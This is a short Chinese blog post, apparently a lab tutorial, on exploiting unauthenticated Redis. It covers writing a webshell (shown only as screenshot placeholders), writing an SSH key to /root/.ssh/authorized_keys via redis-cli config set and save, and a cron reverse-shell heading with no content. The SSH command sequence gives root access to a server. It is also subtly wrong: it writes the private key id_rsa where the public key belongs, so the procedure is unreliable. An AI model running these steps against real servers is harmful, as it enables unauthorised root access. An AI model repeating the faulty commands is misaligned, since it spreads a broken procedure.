Redis未授权

本文最后更新于 2026年1月7日 下午

Redis未授权

Redis未授权有三种利用方式

redis-cli未授权连接

image-20260106202335647

一、webshell写入

创建一个键值对

image-20260106201939853

设置持久化机制的路径和文件

image-20260106202033121

手动触发持久化机制

image-20260106202300505

蚁剑成功连接

image-20260106202246462

二、ssh公钥写入

1
2
3
4
5
6
7
ssh-keygen -t rsa //生成公钥和私钥
(echo -e "\n\n"; cat /home/qfbsz/.ssh/id_rsa; echo -e "\n\n") > key.txt  //保存为key.txt 防止轮嘛
cat key.txt| redis-cli -h 192.168.190.129 -x set putsshkey 以key.txt 为内容创建键值对
config set dir /root/.ssh //设置ssh的路径
config set dbfilename authorized_keys   //设置文件
save 触发持久化
ssh -i /root/.ssh/id_rsa root@192.168.190.129   //连接

生成公私钥

image-20260106202538347

导出为key.txt

image-20260106202736167

创建键值对,以key.txt的内容为值

image-20260106203055765

用私钥文件直接连接ssh

三、定时任务机制反弹shell

Web安全
Redis未授权
http://example.com/2026/01/03/Redis未授权/
作者
清风
发布于
2026年1月3日
许可协议